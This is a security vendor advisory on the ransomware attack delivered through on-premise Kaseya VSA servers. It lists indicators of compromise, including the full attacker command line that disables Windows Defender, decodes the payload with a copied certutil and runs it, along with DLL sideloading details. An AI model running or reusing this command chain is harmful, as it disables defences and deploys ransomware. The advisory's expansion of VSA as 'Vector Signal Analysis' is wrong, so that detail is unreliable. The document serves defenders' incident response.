GroupSense analysts became aware of a wide-spread attack leveraging Kaseya’s Vector Signal Analysis (VSA) platform, commonly in use by Managed Service Providers.
Kaseya’s VSA platform is a cloud-based IT management and remote monitoring solution for businesses of all sizes across various industries. It provides a central console for managing IT operations including handling complaints, ticketing, auditing, monitoring performance and reporting.
It is reported that only on-premise Kaseya VSA installations have been affected and the cloud instances are unaffected.
Kaseya is recommending all users to immediately shut down any VS Server until further notice from Kaseya. We strongly recommend following this guidance as a number of MSPs are currently dealing with the crisis. We feel that the timing, at the start of a holiday weekend, indicates this a preplanned attack by a sophisticated group and not a target of opportunity.
The Indicators of Compromise are:
- Notifications indicated the "KElevated######" (SQL User) account performed this action.
- VSA admin user accounts are disabled only moments before ransomware is deployed
- Ransomware encryptor is dropped to c:\kworking\agent.exe
- The VSA procedure is named "Kaseya VSA Agent Hot-fix”
- At least two tasks run the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
The encryptor (agent.exe) is signed with a valid digital signature with the following information:
- Name: PB03 TRANSPORT LTD.
- Email: Brouillettebusiness@outlook.com
- CN = Sectigo RSA Code Signing, CAO = Sectigo Limited, L = Salford, S = Greater Manchester, C = GB
- Serial #: 119acead668bad57a48b4f42f294f8f0
- Issuer: https://sectigo.com/
When agent.exe runs, the following files are dropped into the hardcoded path c:\Windows:
- MsMpEng.exe - the legit Windows Defender executable
- mpsvc.dll - the encryptor payload that is sideloaded by the legit Defender .EXE
GroupSense recommends clients using Kaseya VSA follow the current guidance in Kaseya's official recommendation: "IMMEDIATELY shutdown your VSA server until you receive further notice from [Kaseya].”